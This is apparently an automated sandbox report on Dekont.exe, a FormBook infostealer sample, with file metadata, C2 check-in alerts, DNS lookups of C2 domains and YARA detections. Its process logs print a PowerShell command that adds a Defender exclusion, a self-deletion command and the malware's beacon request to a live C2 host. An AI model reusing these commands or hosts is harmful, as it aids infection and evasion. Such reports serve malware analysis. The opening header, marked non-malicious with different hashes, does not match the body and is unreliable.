SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.806060646936104
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Dekont.exe
File size: 604'672 bytes
MD5: da966801158ea63939a23e310275241a
SHA1: ef1f98cd080aca6cbf0b1ea8b08e7ab492435ae8
SHA256: 883b2afba671ff4851527b315260a4415a111c013811fec1822dcae4076628e5
SHA512: 0942fbf2efc18d7feff67c24c9d36528ab63937daa3d84c0f34f22d1466d184f38af24a5d264d908b252b6c3c3463f3b33e241aa72ba3e9bec43c55037c58bfd
SSDEEP: 12288:Uh8bQbrxKlcjdOliPwsSpRYAKrgCqZKVvsABefO5fw:U+I9kiPqR/04KCABem
TLSH: 88D402852255CB1AD4A64BB40563D2FC27B55ECDB812C34B5FCABEEF7C7AB000A40766
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....v...............0..............M... ...`....@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x494dfa
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x8F76A18B [Mon Apr 9 19:54:51 2046 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x94da7 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x96000 | 0x620 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x93ba4 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x92e00 | 0x92e00 | 82361f55a1c27d15b9b8e8deb3ca0539 | False | 0.9234807180851063 | data | 7.817099894790621 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x96000 | 0x620 | 0x800 | 5affcf1ae180c5987efbe56a1776b2bc | False | 0.3349609375 | data | 3.452543589960233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x98000 | 0xc | 0x200 | 46d3957350b9e9f39b8baeb5b3fb2933 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x96090 | 0x390 | data | | | 0.4243421052631579
RT_MANIFEST | 0x96430 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-25T09:00:23.908530+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49715 | 185.26.122.70 | 80 | TCP
2024-09-25T09:00:23.908530+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49715 | 185.26.122.70 | 80 | TCP
2024-09-25T09:00:23.908530+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49715 | 185.26.122.70 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 09:00:23.393095970 CEST | 49715 | 80 | 192.168.2.5 | 185.26.122.70
Sep 25, 2024 09:00:23.397943974 CEST | 80 | 49715 | 185.26.122.70 | 192.168.2.5
Sep 25, 2024 09:00:23.398010969 CEST | 49715 | 80 | 192.168.2.5 | 185.26.122.70
Sep 25, 2024 09:00:23.398080111 CEST | 49715 | 80 | 192.168.2.5 | 185.26.122.70
Sep 25, 2024 09:00:23.402847052 CEST | 80 | 49715 | 185.26.122.70 | 192.168.2.5
Sep 25, 2024 09:00:23.901675940 CEST | 49715 | 80 | 192.168.2.5 | 185.26.122.70
Sep 25, 2024 09:00:23.906877041 CEST | 80 | 49715 | 185.26.122.70 | 192.168.2.5
Sep 25, 2024 09:00:23.908529997 CEST | 49715 | 80 | 192.168.2.5 | 185.26.122.70
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                 Sep 25, 2024 08:57:40.481304884 CEST | 52626 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 08:57:40.497243881 CEST | 53 | 52626 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 08:58:00.261334896 CEST | 55632 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 08:58:00.286113977 CEST | 53 | 55632 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 08:58:20.527314901 CEST | 55944 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 08:58:20.536608934 CEST | 53 | 55944 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 08:59:01.404853106 CEST | 65439 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 08:59:01.419966936 CEST | 53 | 65439 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 08:59:21.857069969 CEST | 50072 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 08:59:21.892051935 CEST | 53 | 50072 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 08:59:42.296004057 CEST | 65292 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 08:59:42.327967882 CEST | 53 | 65292 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 09:00:02.792985916 CEST | 56083 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 09:00:02.801386118 CEST | 53 | 56083 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 09:00:23.256860971 CEST | 59507 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 09:00:23.391716957 CEST | 53 | 59507 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 09:00:43.656501055 CEST | 53185 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 09:00:43.825239897 CEST | 53 | 53185 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 09:01:04.128222942 CEST | 54142 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 09:01:04.138254881 CEST | 53 | 54142 | 1.1.1.1 | 192.168.2.5
                                 Sep 25, 2024 09:01:25.964833975 CEST | 51739 | 53 | 192.168.2.5 | 1.1.1.1
                                 Sep 25, 2024 09:01:25.973809004 CEST | 53 | 51739 | 1.1.1.1 | 192.168.2.5
                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                 Sep 25, 2024 08:57:40.481304884 CEST | 192.168.2.5 | 1.1.1.1 | 0x73c9 | Standard query (0) | www.ar-accident-lawyer-389.today | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:58:00.261334896 CEST | 192.168.2.5 | 1.1.1.1 | 0xa67c | Standard query (0) | www.nnevateknoloji.xyz | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:58:20.527314901 CEST | 192.168.2.5 | 1.1.1.1 | 0x8ee | Standard query (0) | www.eddogbrands.website | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:59:01.404853106 CEST | 192.168.2.5 | 1.1.1.1 | 0x4d85 | Standard query (0) | www.inancialenlightment.info | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:59:21.857069969 CEST | 192.168.2.5 | 1.1.1.1 | 0xc0ec | Standard query (0) | www.omotech-dz.net | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:59:42.296004057 CEST | 192.168.2.5 | 1.1.1.1 | 0xd181 | Standard query (0) | www.y-language-menu.net | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:00:02.792985916 CEST | 192.168.2.5 | 1.1.1.1 | 0x50c | Standard query (0) | www.ebshieldsrenew.live | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:00:23.256860971 CEST | 192.168.2.5 | 1.1.1.1 | 0xd0a7 | Standard query (0) | www.oko.events | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:00:43.656501055 CEST | 192.168.2.5 | 1.1.1.1 | 0xfa71 | Standard query (0) | www.hildrens-clothing.today | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:01:04.128222942 CEST | 192.168.2.5 | 1.1.1.1 | 0x4f17 | Standard query (0) | www.olocaustaffirmer.net | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:01:25.964833975 CEST | 192.168.2.5 | 1.1.1.1 | 0x9270 | Standard query (0) | www.eals.lat | A (IP address) | IN (0x0001) | false
                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                 Sep 25, 2024 08:57:40.497243881 CEST | 1.1.1.1 | 192.168.2.5 | 0x73c9 | Name error (3) | www.ar-accident-lawyer-389.today | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:58:00.286113977 CEST | 1.1.1.1 | 192.168.2.5 | 0xa67c | Name error (3) | www.nnevateknoloji.xyz | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:58:20.536608934 CEST | 1.1.1.1 | 192.168.2.5 | 0x8ee | Name error (3) | www.eddogbrands.website | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:59:01.419966936 CEST | 1.1.1.1 | 192.168.2.5 | 0x4d85 | Name error (3) | www.inancialenlightment.info | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:59:21.892051935 CEST | 1.1.1.1 | 192.168.2.5 | 0xc0ec | Name error (3) | www.omotech-dz.net | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 08:59:42.327967882 CEST | 1.1.1.1 | 192.168.2.5 | 0xd181 | Name error (3) | www.y-language-menu.net | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:00:02.801386118 CEST | 1.1.1.1 | 192.168.2.5 | 0x50c | Name error (3) | www.ebshieldsrenew.live | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:00:23.391716957 CEST | 1.1.1.1 | 192.168.2.5 | 0xd0a7 | No error (0) | www.oko.events | | 185.26.122.70 | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:00:43.825239897 CEST | 1.1.1.1 | 192.168.2.5 | 0xfa71 | Name error (3) | www.hildrens-clothing.today | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:01:04.138254881 CEST | 1.1.1.1 | 192.168.2.5 | 0x4f17 | Name error (3) | www.olocaustaffirmer.net | none | none | A (IP address) | IN (0x0001) | false
                                 Sep 25, 2024 09:01:25.973809004 CEST | 1.1.1.1 | 192.168.2.5 | 0x9270 | Name error (3) | www.eals.lat | none | none | A (IP address) | IN (0x0001) | false
                                • www.oko.events
                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 0 | 192.168.2.5 | 49715 | 185.26.122.70 | 80 | 1028 | C:\Windows\explorer.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Sep 25, 2024 09:00:23.398080111 CEST | 168 | OUT | GET /bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0 HTTP/1.1
                                Host: www.oko.events
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:



                                Target ID:0
                                Start time:02:57:01
                                Start date:25/09/2024
                                Path:C:\Users\user\Desktop\Dekont.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Dekont.exe"
                                Imagebase:0x4a0000
                                File size:604'672 bytes
                                MD5 hash:DA966801158EA63939A23E310275241A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:02:57:02
                                Start date:25/09/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"
                                Imagebase:0x430000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:02:57:02
                                Start date:25/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:02:57:02
                                Start date:25/09/2024
                                Path:C:\Users\user\Desktop\Dekont.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Dekont.exe"
                                Imagebase:0x4a0000
                                File size:604'672 bytes
                                MD5 hash:DA966801158EA63939A23E310275241A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000005.00000002.2142589404.0000000000EDF000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:02:57:03
                                Start date:25/09/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff674740000
                                File size:5'141'208 bytes
                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4538701995.000000000E768000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:7
                                Start time:02:57:05
                                Start date:25/09/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff6ef0c0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:8
                                Start time:02:57:07
                                Start date:25/09/2024
                                Path:C:\Windows\SysWOW64\control.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\control.exe"
                                Imagebase:0x870000
                                File size:149'504 bytes
                                MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                Target ID:9
                                Start time:02:57:10
                                Start date:25/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\Dekont.exe"
                                Imagebase:0x790000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:10
                                Start time:02:57:11
                                Start date:25/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:8.6%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:76
                                  Total number of Limit Nodes:6
                                   execution_graph: node and edge dump of the rendered execution graph (76 nodes); Windows APIs reached in the graph: DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateActCtxA, GetModuleHandleW

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   control_flow_graph: basic-block edge dump of the function spanning 271d030-271d20d (graph rendering not recoverable; the APIs it calls are listed under APIs)
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0271D0BE
                                  • GetCurrentThread.KERNEL32 ref: 0271D0FB
                                  • GetCurrentProcess.KERNEL32 ref: 0271D138
                                  • GetCurrentThreadId.KERNEL32 ref: 0271D191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: d4893dc8569401f4ffd9a0c60c40e7236dae77dc8b529c9a30025351e8e61ee5
                                  • Instruction ID: c188d093ebfb1aa74634e818c0b832262a69775bfb4bbd0fd37b04193af433bf
                                  • Opcode Fuzzy Hash: d4893dc8569401f4ffd9a0c60c40e7236dae77dc8b529c9a30025351e8e61ee5
                                  • Instruction Fuzzy Hash: 8B5167B0A013498FDB14CFA9D988B9EBBF1EF48314F248459E419A7351D734A944CF65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   control_flow_graph: basic-block edge dump of the function spanning 271d040-271d20d (graph rendering not recoverable; the APIs it calls are listed under APIs)
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0271D0BE
                                  • GetCurrentThread.KERNEL32 ref: 0271D0FB
                                  • GetCurrentProcess.KERNEL32 ref: 0271D138
                                  • GetCurrentThreadId.KERNEL32 ref: 0271D191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: ff1d17aed402984c2d0829463bd9fb62404b74d7f5d721d924f777b9386c6eae
                                  • Instruction ID: 2566b24d1ba9ec6e76bcd84fad2904dce70bb84557c64442f669574208a55967
                                  • Opcode Fuzzy Hash: ff1d17aed402984c2d0829463bd9fb62404b74d7f5d721d924f777b9386c6eae
                                  • Instruction Fuzzy Hash: EF5157B0A003498FDB14DFA9D988B9EBBF1FF48314F208459E419A7351D734A944CF65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   control_flow_graph: basic-block edge dump of the function spanning 271ada8-271b028 (graph rendering not recoverable; the APIs it calls are listed under APIs)
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0271AFFE
                                  Memory Dump Source
